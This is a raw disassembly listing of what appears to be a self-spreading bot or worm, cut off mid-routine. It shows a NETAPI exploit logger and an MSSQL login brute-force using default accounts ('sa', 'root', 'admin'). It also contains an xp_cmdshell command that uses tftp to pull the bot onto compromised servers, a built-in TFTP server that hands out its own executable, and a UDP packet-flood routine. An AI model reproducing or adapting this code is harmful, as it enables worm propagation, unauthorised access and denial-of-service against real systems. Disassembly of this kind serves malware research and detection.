loc_41B7CD:				; CODE XREF: sub_41B3E7+3EBj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41B7CD
		sub	eax, ecx
		mov	[esp+eax+8+arg_210], dl
		jmp	short loc_41B7F6
; ---------------------------------------------------------------------------

loc_41B7DF:				; CODE XREF: sub_41B3E7+388j
		push	100h
		lea	esi, [esp+0Ch+arg_210]
		mov	ebx, offset dword_427F68
		call	sub_41A301
		pop	ecx

loc_41B7F6:				; CODE XREF: sub_41B3E7+3F6j
		lea	eax, [esp+8+arg_210]
		push	eax
		call	sub_414FA3
		mov	esi, eax
		test	esi, esi
		pop	ecx
		jz	loc_41BAA4
		push	esi
		push	1
		call	sub_414D82
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_41B82E
		push	esi
		push	2
		call	sub_414D82
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	loc_41BAA4

loc_41B82E:				; CODE XREF: sub_41B3E7+433j
		mov	esi, [esp+8+arg_8]
		dec	eax
		push	eax
		mov	eax, [esp+0Ch+arg_14]
		add	eax, esi
		push	offset byte_437CC8
		push	eax
		call	sub_4081B0
		mov	eax, [esp+14h+arg_1C]
		mov	eax, dword_42680C[eax]
		add	esp, 0Ch
		cmp	[esp+8+arg_C], 1
		jnz	short loc_41B885
		mov	ecx, dword_437E88
		mov	[eax+esi], ecx
		mov	ecx, dword_426824
		add	eax, 0Ch
		mov	[eax+esi], ecx
		mov	ecx, dword_426824
		lea	eax, [eax+esi+24h]
		mov	[eax], ecx
		mov	ecx, dword_426824
		mov	[eax+0Ch], ecx
		jmp	short loc_41B89F
; ---------------------------------------------------------------------------

loc_41B885:				; CODE XREF: sub_41B3E7+470j
		cmp	[esp+8+arg_C], 0
		jnz	short loc_41B89F
		push	10h
		add	eax, esi
		pop	ecx

loc_41B891:				; CODE XREF: sub_41B3E7+4B6j
		mov	edx, dword_426824
		mov	[eax], edx
		add	eax, 4
		dec	ecx
		jnz	short loc_41B891

loc_41B89F:				; CODE XREF: sub_41B3E7+49Cj
					; sub_41B3E7+4A3j
		mov	edi, [esp+8+arg_10]
		add	edi, 42h
		push	edi
		call	sub_403C6E
		mov	ebx, eax
		test	ebx, ebx
		pop	ecx
		jz	loc_41BABA
		push	edi
		push	0
		push	ebx
		call	sub_408130
		push	5
		pop	ecx
		lea	esi, [esp+14h+arg_94]
		mov	edi, ebx
		rep movsd
		mov	esi, [esp+14h+arg_10]
		mov	eax, esi
		test	eax, eax
		mov	[esp+14h+arg_10], eax
		fild	[esp+14h+arg_10]
		jge	short loc_41B8E6
		fadd	ds:flt_422020

loc_41B8E6:				; CODE XREF: sub_41B3E7+4F7j
		fmul	ds:dbl_422018
		add	esp, 4
		fstp	[esp+10h+arg_10]
		fld	[esp+10h+arg_10]
		fstp	qword ptr [esp]
		call	sub_404380
		fstp	[esp+10h+arg_10]
		fld	[esp+10h+arg_10]
		call	sub_41CCE6
		and	dword ptr [ebx+18h], 0
		push	esi
		push	[esp+14h+arg_8]
		mov	[ebx+1Ch], eax
		mov	[ebx+14h], eax
		lea	eax, [ebx+20h]
		push	eax
		call	sub_4081B0
		add	esp, 14h
		lea	eax, [esi+20h]
		jmp	short loc_41B92D
; ---------------------------------------------------------------------------

loc_41B92C:				; CODE XREF: sub_41B3E7+548j
		inc	eax

loc_41B92D:				; CODE XREF: sub_41B3E7+543j
		test	al, 3
		jnz	short loc_41B92C
		push	7
		lea	edi, [ebx+eax]
		pop	ecx
		push	[esp+8+arg_8]
		add	eax, 1Ch
		lea	esi, [esp+0Ch+arg_78]
		rep movsd
		mov	[esp+0Ch+arg_14], eax
		call	sub_403B91
		pop	ecx
		push	6
		xor	eax, eax
		pop	ecx
		lea	edi, [esp+8+arg_28]
		rep stosd
		mov	byte ptr [esp+8+arg_28+1], al
		mov	byte ptr [esp+8+arg_28+2], al
		lea	edi, [esp+8+arg_40]
		stosd
		xor	esi, esi
		stosd
		stosd
		push	esi
		push	esi
		stosd
		push	1
		push	esi
		mov	byte ptr [esp+18h+arg_28], 5
		mov	byte ptr [esp+18h+arg_28+3], 3
		mov	[esp+18h+arg_2C], 10h
		mov	word ptr [esp+18h+arg_30+2], si
		mov	[esp+18h+arg_34], esi
		mov	word ptr [esp+18h+arg_3C], si
		mov	word ptr [esp+18h+arg_3C+2], 1Fh
		stosd
		call	ds:off_41E09C
		mov	dword ptr [esp+8+arg_50], eax
		mov	byte ptr [esp+8+arg_0+3], 0
		mov	[esp+8+arg_8], esi

loc_41B9AE:				; CODE XREF: sub_41B3E7+659j
		cmp	[esp+8+arg_8], 2
		jge	loc_41BA46
		inc	[esp+8+arg_8]
		push	1
		push	10B8h
		push	[esp+10h+arg_14]
		lea	esi, [esp+14h+arg_28]
		push	ebx
		sub	esp, 18h
		push	6
		pop	ecx
		mov	edi, esp
		push	[esp+30h+arg_4]
		rep movsd
		call	sub_4179EC
		add	esp, 2Ch
		test	al, al
		jz	short loc_41BA46
		cmp	dword ptr [esp+8+arg_50], 0
		jz	short loc_41BA3B
		lea	eax, [esp+8+arg_40]
		push	eax
		lea	eax, [esp+0Ch+arg_20]
		push	eax
		push	2000h
		lea	eax, [esp+14h+arg_4410]
		push	eax
		push	[esp+18h+arg_4]
		call	ds:off_41E078
		test	eax, eax
		jnz	short loc_41BA20
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 3E5h
		jnz	short loc_41BA3B

loc_41BA20:				; CODE XREF: sub_41B3E7+62Aj
		push	3E8h
		push	dword ptr [esp+0Ch+arg_50]
		call	ds:off_41E07C
		cmp	eax, 102h
		jnz	short loc_41BA3B
		mov	byte ptr [esp+8+arg_0+3], 1

loc_41BA3B:				; CODE XREF: sub_41B3E7+605j
					; sub_41B3E7+637j ...
		cmp	byte ptr [esp+8+arg_0+3], 0
		jz	loc_41B9AE

loc_41BA46:				; CODE XREF: sub_41B3E7+5CCj
					; sub_41B3E7+5FEj
		push	[esp+8+arg_4]
		mov	esi, ds:off_41E0D8
		call	esi ; sub_443E8D
		push	ebx
		call	sub_403B91
		cmp	[esp+10h+arg_4C], 0
		pop	ecx
		jz	short loc_41BA66
		push	[esp+0Ch+arg_4C]
		call	esi ; sub_443E8D

loc_41BA66:				; CODE XREF: sub_41B3E7+677j
		cmp	byte ptr [esp+13h], 0
		jnz	short loc_41BAC7
		cmp	[esp+0Ch+arg_8], 0
		jnz	short loc_41BA8D
		mov	[esp+0Ch+arg_8], 1
		xor	ebx, ebx
		jmp	loc_41B433
; ---------------------------------------------------------------------------

loc_41BA83:				; CODE XREF: sub_41B3E7+1E5j
					; sub_41B3E7+2F7j
		push	[esp+8+arg_4]
		call	ds:off_41E0D8

loc_41BA8D:				; CODE XREF: sub_41B3E7+51j
					; sub_41B3E7+B9j ...
		xor	al, al

loc_41BA8F:				; CODE XREF: sub_41B3E7+732j
		mov	ecx, [esp+0Ch+arg_6410]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_41BAA4:				; CODE XREF: sub_41B3E7+421j
					; sub_41B3E7+441j
		push	[esp+8+arg_4]
		call	ds:off_41E0D8
		push	[esp+0Ch+arg_4]

loc_41BAB2:				; CODE XREF: sub_41B3E7+6DEj
		call	sub_403B91
		pop	ecx
		jmp	short loc_41BA8D
; ---------------------------------------------------------------------------

loc_41BABA:				; CODE XREF: sub_41B3E7+4CAj
		push	[esp+8+arg_4]
		call	ds:off_41E0D8
		push	esi
		jmp	short loc_41BAB2
; ---------------------------------------------------------------------------

loc_41BAC7:				; CODE XREF: sub_41B3E7+684j
		push	[esp+0Ch+arg_20]
		call	ds:dword_41E25C	; inet_ntoa
		push	eax
		mov	eax, [esp+10h+arg_1EC]
		imul	eax, 2Ch
		add	eax, offset aNetapi ; "NETAPI"
		push	eax
		push	offset aSExploitedS_ ; "%s: Exploited: %s."
		lea	eax, [esp+18h+arg_EC]
		push	eax
		push	[esp+1Ch+arg_1F8]
		push	offset dword_4294DC
		call	sub_417FE1
		mov	eax, [esp+24h+arg_1EC]
		imul	eax, 2Ch
		lea	eax, dword_42554C[eax]
		add	esp, 18h
		inc	dword ptr [eax]
		mov	al, [esp+13h]
		jmp	loc_41BA8F
sub_41B3E7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=0CD8h


sub_41BB1E	proc near		; DATA XREF: .data:0042557Co

var_D54		= dword	ptr -0D54h
var_D50		= dword	ptr -0D50h
var_D4C		= dword	ptr -0D4Ch
var_D48		= dword	ptr -0D48h
var_D44		= byte ptr -0D44h
var_D40		= dword	ptr -0D40h
var_D3C		= dword	ptr -0D3Ch
var_D38		= dword	ptr -0D38h
var_D34		= dword	ptr -0D34h
var_D30		= dword	ptr -0D30h
var_D2C		= dword	ptr -0D2Ch
var_D26		= byte ptr -0D26h
var_D25		= byte ptr -0D25h
var_D24		= byte ptr -0D24h
var_C24		= dword	ptr -0C24h
var_C20		= dword	ptr -0C20h
var_C1C		= dword	ptr -0C1Ch
var_C18		= dword	ptr -0C18h
var_C14		= byte ptr -0C14h
var_814		= byte ptr -814h
var_414		= byte ptr -414h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		lea	ebp, [esp-0CD8h]
		sub	esp, 0D54h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+0CD8h+var_4], eax
		push	ebx
		push	esi
		push	edi
		push	44h
		pop	ecx
		xor	ebx, ebx
		xor	eax, eax
		mov	[ebp+0CD8h+var_14], bl
		lea	esi, [ebp+0CD8h+arg_0]
		lea	edi, [ebp+0CD8h+var_D24]
		rep movsd
		lea	edi, [ebp+0CD8h+var_13]
		stosd
		stosd
		stosd
		stosw
		stosb
		mov	eax, [ebp+0CD8h+var_C20]
		mov	[ebp+0CD8h+var_D40], eax
		lea	eax, [ebp+0CD8h+var_D34]
		push	eax
		push	ebx
		push	1
		mov	[ebp+0CD8h+var_D26], bl
		mov	[ebp+0CD8h+var_D54], offset aSa	; "sa"
		mov	[ebp+0CD8h+var_D50], offset aRoot ; "root"
		mov	[ebp+0CD8h+var_D4C], offset aAdmin ; "admin"
		mov	[ebp+0CD8h+var_D48], ebx
		mov	[ebp+0CD8h+var_D25], bl
		mov	[ebp+0CD8h+var_D2C], ebx
		mov	[ebp+0CD8h+var_D30], ebx
		call	sub_402BB8
		test	ax, ax
		jz	short loc_41BBB8

loc_41BB9E:				; CODE XREF: sub_41BB1E+AEj
		xor	al, al

loc_41BBA0:				; CODE XREF: sub_41BB1E+CFj
		mov	ecx, [ebp+0CD8h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 0CD8h
		leave
		retn
; ---------------------------------------------------------------------------

loc_41BBB8:				; CODE XREF: sub_41BB1E+7Ej
		push	0FFFFFFFAh
		push	3
		push	0C8h
		push	[ebp+0CD8h+var_D34]
		call	sub_402BAC
		test	ax, ax
		jnz	short loc_41BB9E
		lea	eax, [ebp+0CD8h+var_D2C]
		push	eax
		push	[ebp+0CD8h+var_D34]
		push	2
		call	sub_402BB8
		test	ax, ax
		jz	short loc_41BBEF

loc_41BBE1:				; CODE XREF: sub_41BB1E+22Bj
		push	[ebp+0CD8h+var_D34]
		push	1
		call	sub_402BBE
		mov	al, bl
		jmp	short loc_41BBA0
; ---------------------------------------------------------------------------

loc_41BBEF:				; CODE XREF: sub_41BB1E+C1j
		mov	edi, ds:dword_41E25C
		lea	ecx, [ebp+0CD8h+var_D54]
		mov	[ebp+0CD8h+var_D3C], ecx

loc_41BBFB:				; CODE XREF: sub_41BB1E+1D0j
		cmp	off_426830, ebx
		mov	[ebp+0CD8h+var_D38], ebx
		jz	loc_41BCE3
		mov	esi, [ecx]
		mov	eax, offset off_426830

loc_41BC11:				; CODE XREF: sub_41BB1E+16Bj
		lea	ecx, [ebp+0CD8h+var_D26]
		push	ecx
		push	dword ptr [eax]
		push	esi
		push	[ebp+0CD8h+var_C1C]
		push	[ebp+0CD8h+var_D40]
		call	edi	; inet_ntoa
		push	eax
		lea	eax, [ebp+0CD8h+var_414]
		push	offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
		push	eax
		call	sub_403643
		lea	eax, [ebp+0CD8h+var_414]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_41BC41:				; CODE XREF: sub_41BB1E+128j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41BC41
		push	ebx
		sub	eax, ecx
		lea	ecx, [ebp+0CD8h+var_D44]
		push	ecx
		push	400h
		lea	ecx, [ebp+0CD8h+var_C14]
		push	ecx
		push	eax
		lea	eax, [ebp+0CD8h+var_414]
		push	eax
		push	ebx
		push	[ebp+0CD8h+var_D2C]
		call	sub_402BB2
		movzx	eax, ax
		cmp	ax, bx
		jz	short loc_41BC8D
		cmp	ax, 1
		jz	short loc_41BC8D
		inc	[ebp+0CD8h+var_D38]
		mov	eax, [ebp+0CD8h+var_D38]
		lea	eax, ds:426830h[eax*4]
		cmp	[eax], ebx
		jnz	short loc_41BC11
		jmp	short loc_41BCE3
; ---------------------------------------------------------------------------

loc_41BC8D:				; CODE XREF: sub_41BB1E+154j
					; sub_41BB1E+15Aj
		lea	eax, [ebp+0CD8h+var_D30]
		push	eax
		push	[ebp+0CD8h+var_D2C]
		push	3
		call	sub_402BB8
		push	dword_4294DC
		lea	esi, [ebp+0CD8h+var_14]
		call	sub_419C46
		mov	eax, esi
		push	eax
		lea	eax, [ebp+0CD8h+var_814]
		push	offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
		push	eax
		call	sub_403643
		add	esp, 10h
		push	0FFFFFFFDh
		lea	eax, [ebp+0CD8h+var_814]
		push	eax
		push	[ebp+0CD8h+var_D30]
		call	sub_402BC4
		test	ax, ax
		jz	short loc_41BCF6
		push	[ebp+0CD8h+var_D30]
		push	3
		call	sub_402BBE

loc_41BCE3:				; CODE XREF: sub_41BB1E+E6j
					; sub_41BB1E+16Dj
		mov	ecx, [ebp+0CD8h+var_D3C]
		add	ecx, 4
		cmp	[ecx], ebx
		mov	[ebp+0CD8h+var_D3C], ecx
		jnz	loc_41BBFB
		jmp	short loc_41BD3C
; ---------------------------------------------------------------------------

loc_41BCF6:				; CODE XREF: sub_41BB1E+1B9j
		push	[ebp+0CD8h+var_D40]
		mov	[ebp+0CD8h+var_D25], 1
		call	edi	; inet_ntoa
		push	eax
		mov	eax, [ebp+0CD8h+var_C24]
		imul	eax, 2Ch
		add	eax, offset aNetapi ; "NETAPI"
		push	eax
		push	offset aSExploitedS__0 ; "%s: Exploited	%s."
		lea	eax, [ebp+0CD8h+var_D24]
		push	eax
		push	[ebp+0CD8h+var_C18]
		push	offset dword_4294DC
		call	sub_417FE1
		mov	eax, [ebp+0CD8h+var_C24]
		imul	eax, 2Ch
		lea	eax, dword_42554C[eax]
		add	esp, 18h
		inc	dword ptr [eax]

loc_41BD3C:				; CODE XREF: sub_41BB1E+1D6j
		push	[ebp+0CD8h+var_D2C]
		push	2
		call	sub_402BBE
		mov	bl, [ebp+0CD8h+var_D25]
		jmp	loc_41BBE1
sub_41BB1E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41BD4E	proc near		; DATA XREF: sub_41BF50+15Ao

var_23C		= dword	ptr -23Ch
var_238		= dword	ptr -238h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= word ptr -224h
var_222		= word ptr -222h
var_220		= byte ptr -220h
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 240h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		xor	ebx, ebx
		cmp	esi, ebx
		push	edi
		jnz	short loc_41BD74

loc_41BD6D:				; CODE XREF: sub_41BD4E+42j
					; sub_41BD4E+5Dj ...
		push	ebx
		call	ds:off_41E10C

loc_41BD74:				; CODE XREF: sub_41BD4E+1Dj
		lea	edi, [ebp+var_18]
		movsd
		movsd
		push	11h
		movsd
		push	2
		push	2
		movsd
		call	ds:dword_41E220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_230], eax
		jz	short loc_41BD6D
		push	offset aRb	; "rb"
		push	offset dword_429508
		call	sub_403782
		cmp	eax, ebx
		pop	ecx
		pop	ecx
		mov	[ebp+var_228], eax
		jz	short loc_41BD6D
		push	eax
		mov	[ebp+var_22C], ebx
		mov	[ebp+var_23C], 10h
		call	sub_404083
		test	eax, eax
		pop	ecx
		jnz	loc_41BEBC
		mov	esi, ds:dword_41E270

loc_41BDD2:				; CODE XREF: sub_41BD4E+168j
		push	204h
		lea	eax, [ebp+var_224]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		xor	eax, eax
		inc	[ebp+var_22C]
		push	[ebp+var_22C]
		lea	edi, [ebp+var_238]
		stosd
		call	esi	; htons
		push	3
		mov	[ebp+var_222], ax
		call	esi	; htons
		push	[ebp+var_228]
		mov	[ebp+var_224], ax
		push	200h
		lea	eax, [ebp+var_220]
		push	1
		push	eax
		call	sub_40430F
		mov	edi, [ebp+var_230]
		add	esp, 10h
		push	10h
		lea	ecx, [ebp+var_18]
		push	ecx
		push	ebx
		add	eax, 4
		push	eax
		lea	eax, [ebp+var_224]
		push	eax
		push	edi
		call	ds:dword_41E248	; sendto
		cmp	eax, 0FFFFFFFFh
		jz	loc_41BF38
		lea	eax, [ebp+var_23C]
		push	eax
		lea	eax, [ebp+var_18]
		push	eax
		push	ebx
		push	4
		lea	eax, [ebp+var_238]
		push	eax
		push	edi
		call	ds:dword_41E258	; recvfrom
		cmp	eax, 0FFFFFFFFh
		jz	loc_41BF38
		push	[ebp+var_238]
		call	ds:dword_41E250	; htons
		cmp	ax, 4
		jnz	loc_41BF38
		push	[ebp+var_238+2]
		call	ds:dword_41E250	; htons
		cmp	ax, word ptr [ebp+var_22C]
		jnz	loc_41BF38
		push	[ebp+var_228]
		call	sub_404083
		test	eax, eax
		pop	ecx
		jz	loc_41BDD2

loc_41BEBC:				; CODE XREF: sub_41BD4E+78j
		inc	dword_437B44
		push	100h
		call	sub_402BD6
		mov	esi, eax
		push	esi
		call	sub_402FD3
		push	eax
		mov	ebx, offset aTtac ; "â‗"
		call	sub_41A301
		add	esp, 0Ch
		push	dword_437B44
		push	[ebp+var_14]
		call	ds:dword_41E25C	; inet_ntoa
		push	eax
		push	offset aTftpSendComple ; "TFTP:	Send Complete To %s. %d	Total Sen"...
		push	esi
		push	0
		push	offset dword_4294DC
		call	sub_417FE1
		push	esi
		call	sub_403129
		add	esp, 1Ch
		push	[ebp+var_230]
		call	ds:dword_41E280	; closesocket
		push	[ebp+var_228]
		call	sub_403A52
		pop	ecx
		mov	ecx, [ebp+var_8]
		pop	edi
		pop	esi
		xor	ecx, ebp
		xor	eax, eax
		pop	ebx
		call	sub_402C9E
		leave
		retn	4
; ---------------------------------------------------------------------------

loc_41BF38:				; CODE XREF: sub_41BD4E+100j
					; sub_41BD4E+125j ...
		push	edi
		call	ds:dword_41E280	; closesocket
		push	[ebp+var_228]
		call	sub_403A52
		pop	ecx
		jmp	loc_41BD6D
sub_41BD4E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41BF50	proc near		; DATA XREF: sub_41C0F3+53o

var_148		= dword	ptr -148h
var_144		= dword	ptr -144h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= byte ptr -138h
var_134		= dword	ptr -134h
var_120		= dword	ptr -120h
var_11C		= dword	ptr -11Ch
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 14Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+14Ch+var_4], eax
		push	ebx
		push	esi
		push	edi
		push	11h
		xor	esi, esi
		push	2
		inc	esi
		push	2
		mov	[esp+164h+var_140], esi
		call	ds:dword_41E220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	dword_429504, eax
		jnz	short loc_41BF99
		xor	ebx, ebx

loc_41BF8C:				; CODE XREF: sub_41BF50+C1j
		mov	byte_437B3D, bl

loc_41BF92:				; CODE XREF: sub_41BF50+BFj
		push	ebx
		call	ds:off_41E10C

loc_41BF99:				; CODE XREF: sub_41BF50+38j
		push	4
		lea	ecx, [esp+15Ch+var_140]
		push	ecx
		push	4
		push	0FFFFh
		push	eax
		call	ds:dword_41E24C	; setsockopt
		xor	eax, eax
		lea	edi, [esp+158h+var_14]
		stosd
		stosd
		stosd
		stosd
		push	45h
		mov	[esp+15Ch+var_14], 2
		call	ds:dword_41E270	; htons
		mov	[esp+158h+var_12], ax
		push	10h
		lea	eax, [esp+15Ch+var_14]
		push	eax
		push	dword_429504
		xor	ebx, ebx
		mov	[esp+164h+var_10], ebx
		call	ds:dword_41E27C	; bind
		cmp	eax, 0FFFFFFFFh
		jnz	loc_41C0C2
		push	dword_429504
		call	ds:dword_41E280	; closesocket
		cmp	byte_437B3D, bl
		jz	short loc_41BF92
		jmp	loc_41BF8C
; ---------------------------------------------------------------------------

loc_41C016:				; CODE XREF: sub_41BF50+178j
		mov	eax, dword_429504
		mov	[esp+158h+var_11C], eax
		xor	eax, eax
		lea	edi, [esp+158h+var_148]
		stosd
		stosd
		lea	eax, [esp+158h+var_148]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [esp+164h+var_120]
		push	eax
		push	ebx
		mov	[esp+16Ch+var_120], esi
		mov	[esp+16Ch+var_148], 5
		mov	[esp+16Ch+var_144], ebx
		call	ds:dword_41E254	; select
		test	eax, eax
		jle	short loc_41C0C2
		xor	eax, eax
		lea	edi, [esp+158h+var_134]
		stosd
		stosd
		stosd
		stosd
		stosd
		lea	eax, [esp+158h+var_13C]
		push	eax
		lea	eax, [esp+15Ch+var_14]
		push	eax
		push	ebx
		push	14h
		lea	eax, [esp+168h+var_134]
		push	eax
		push	dword_429504
		mov	[esp+170h+var_13C], 10h
		call	ds:dword_41E258	; recvfrom
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41C0C2
		push	[esp+158h+var_134]
		inc	dword_437B40
		call	ds:dword_41E250	; htons
		cmp	ax, si
		jnz	short loc_41C0C2
		lea	eax, [esp+158h+var_138]
		push	eax
		push	ebx
		lea	eax, [esp+160h+var_14]
		push	eax
		push	offset sub_41BD4E
		push	ebx
		push	ebx
		call	ds:off_41E090
		push	3E8h
		call	ds:off_41E0F8

loc_41C0C2:				; CODE XREF: sub_41BF50+A7j
					; sub_41BF50+FCj ...
		cmp	byte_437B3D, bl
		jnz	loc_41C016
		push	dword_429504
		call	ds:dword_41E280	; closesocket
		mov	ecx, [esp+158h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41BF50	endp


; =============== S U B	R O U T	I N E =======================================



sub_41C0F3	proc near		; CODE XREF: sub_4024A4+5Ap
					; sub_41C77E+3B2p
		push	4
		mov	eax, offset loc_41CE04
		call	sub_404B8C
		xor	ebx, ebx
		cmp	byte_437B3D, bl
		jz	short loc_41C10D

loc_41C109:				; CODE XREF: sub_41C0F3+74j
		mov	al, 1
		jmp	short loc_41C171
; ---------------------------------------------------------------------------

loc_41C10D:				; CODE XREF: sub_41C0F3+14j
		mov	edi, 100h
		push	edi
		push	ebx
		mov	esi, offset dword_429508
		push	esi
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	esi
		push	ebx
		call	ds:dword_41E0E0	; GetModuleHandleA
		push	eax
		call	ds:dword_41E060	; GetModuleFileNameA
		push	8
		call	sub_4035D9
		mov	esi, eax
		pop	ecx
		mov	[ebp-10h], esi
		cmp	esi, ebx
		mov	[ebp-4], ebx
		jz	short loc_41C159
		push	offset sub_41BF50
		xor	ecx, ecx
		mov	edi, offset aTftpServer	; "TFTP	Server"
		call	sub_414D0E
		jmp	short loc_41C15B
; ---------------------------------------------------------------------------

loc_41C159:				; CODE XREF: sub_41C0F3+51j
		xor	eax, eax

loc_41C15B:				; CODE XREF: sub_41C0F3+64j
		cmp	[eax+4], ebx
		jz	short loc_41C169
		mov	byte_437B3D, 1
		jmp	short loc_41C109
; ---------------------------------------------------------------------------

loc_41C169:				; CODE XREF: sub_41C0F3+6Bj
		mov	byte_437B3D, bl
		xor	al, al

loc_41C171:				; CODE XREF: sub_41C0F3+18j
		call	sub_404C2B
		retn
sub_41C0F3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C177	proc near		; CODE XREF: sub_40177B+6Cp
					; sub_4019F3+6Cp ...

var_3DC		= dword	ptr -3DCh
var_3D8		= byte ptr -3D8h
var_308		= byte ptr -308h
var_307		= byte ptr -307h
var_208		= byte ptr -208h
var_207		= byte ptr -207h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 3E0h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+3E0h+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		mov	esi, 1FFh
		xor	ebx, ebx
		push	esi
		mov	[esp+3ECh+var_3DC], eax
		lea	eax, [esp+3ECh+var_207]
		push	ebx
		push	eax
		mov	[esp+3F4h+var_208], bl
		call	sub_408130
		add	esp, 0Ch
		push	0FFh
		lea	eax, [esp+3ECh+var_307]
		push	ebx
		push	eax
		mov	[esp+3F4h+var_308], bl
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+3E8h+var_3D8]
		call	sub_415020
		push	[esp+3E8h+var_3DC]
		lea	eax, [esp+3ECh+var_208]
		push	offset aS_16	; "%s"
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [esp+3F8h+var_208]
		add	esp, 10h
		lea	esi, [eax+1]

loc_41C204:				; CODE XREF: sub_41C177+92j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C204
		lea	ecx, [esp+3E8h+var_3D8]
		push	ecx
		sub	eax, esi
		push	eax
		lea	ecx, [esp+3F0h+var_208]
		call	sub_4178E0
		push	200h
		lea	eax, [esp+3F4h+var_208]
		push	ebx
		push	eax
		call	sub_408130
		lea	eax, [esp+3FCh+var_308]
		add	esp, 14h
		push	eax
		lea	ebx, [esp+3ECh+var_3D8]
		call	sub_417760
		pop	ecx
		push	0C0h
		push	0
		push	edi
		call	sub_408130
		add	esp, 0Ch
		xor	esi, esi

loc_41C259:				; CODE XREF: sub_41C177+114j
		movzx	eax, [esp+esi+3E8h+var_308]
		push	eax
		push	edi
		push	offset aSX	; "%s%X"
		push	0BFh
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41C27B:				; CODE XREF: sub_41C177+109j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41C27B
		sub	eax, ecx
		inc	esi
		cmp	esi, 40h
		mov	[eax+edi], dl
		jl	short loc_41C259
		mov	ecx, [esp+3E8h+var_4]
		pop	esi
		pop	ebx
		xor	ecx, esp
		mov	eax, edi
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn
sub_41C177	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C2A3	proc near		; DATA XREF: sub_402385+E8o

arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch
arg_6		= word ptr  0Eh
arg_8		= dword	ptr  10h
arg_14		= byte ptr  1Ch
arg_114		= byte ptr  11Ch
arg_214		= dword	ptr  21Ch
arg_218		= dword	ptr  220h
arg_21C		= dword	ptr  224h
arg_220		= dword	ptr  228h
arg_224		= dword	ptr  22Ch
arg_22B		= byte ptr  233h
arg_22C		= byte ptr  234h
arg_10210	= dword	ptr  10218h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		mov	eax, 1021Ch
		call	sub_4119C0
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+arg_10210], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	11h
		push	2
		mov	ecx, 85h
		lea	edi, [esp+14h+arg_14]
		rep movsd
		push	2
		xor	esi, esi
		call	ds:dword_41E220	; socket
		mov	[esp+0Ch+arg_0], eax
		xor	eax, eax
		lea	edi, [esp+0Ch+arg_4]
		stosd
		stosd
		stosd
		stosd
		lea	eax, [esp+0Ch+arg_114]
		push	eax
		mov	word ptr [esp+10h+arg_4], 2
		call	ds:dword_41E264	; inet_addr
		cmp	eax, 0FFFFFFFFh
		mov	[esp+10h], eax
		jnz	short loc_41C332
		lea	eax, [esp+0Ch+arg_114]
		push	eax
		call	ds:dword_41E244	; gethostbyname
		mov	esi, eax
		test	esi, esi
		jnz	short loc_41C332
		lea	eax, [esp+0Ch+arg_114]
		push	eax
		push	offset aUdpErrorSendin ; "UDP: Error Sending UDP Packets to %s"
		jmp	loc_41C481
; ---------------------------------------------------------------------------

loc_41C332:				; CODE XREF: sub_41C2A3+67j
					; sub_41C2A3+7Bj
		lea	eax, [esp+0Ch+arg_114]
		push	eax
		push	offset aUdpSendingUdpP ; "UDP: Sending UDP Packets to %s"
		lea	eax, [esp+14h+arg_14]
		push	eax
		push	[esp+18h+arg_224]
